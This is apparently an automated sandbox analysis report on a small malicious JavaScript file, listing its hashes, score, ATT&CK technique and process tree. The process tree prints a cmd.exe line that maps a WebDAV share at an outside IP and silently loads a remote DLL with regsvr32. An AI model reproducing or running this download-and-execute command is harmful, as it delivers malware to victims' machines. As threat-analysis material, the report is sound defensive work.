ec1200015dfef84b7b94f5a1877f558b106d7d1c71a79c7fdcfabc3fb40546c6

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
23/07/2024, 07:44

Target

10225127452584925332.js
Size

4KB
MD5

9b9bd29b5986624340bcdaed5660bf17
SHA1

bc4e4c57b2b7cf0d5480b2b3c26c05bb9b57efc2
SHA256

c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701
SHA512

6996f0b1760acd72a60deee04e1064ba65db04a7814b15b6fb55aaebadfb221f6e6083b6b01b3e9762765183d4cfb97755c78b2a8af611157ef7e6a85ca88111
SSDEEP

96:Qxnv7pKjNJj0TQf4lBQdn1HElBvfYY/2SA65jdAkEXMnd65jdYnHJ:wviJrT65ZAkL65ZYnp

Score

3^/10

execution

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3040 wrote to memory of 1216	3040	wscript.exe	31
PID 3040 wrote to memory of 1216	3040	wscript.exe	31
PID 3040 wrote to memory of 1216	3040	wscript.exe	31
PID 1216 wrote to memory of 2956	1216	cmd.exe	33
PID 1216 wrote to memory of 2956	1216	cmd.exe	33
PID 1216 wrote to memory of 2956	1216	cmd.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\10225127452584925332.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\204172964725065.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:2956

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

JavaScript

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact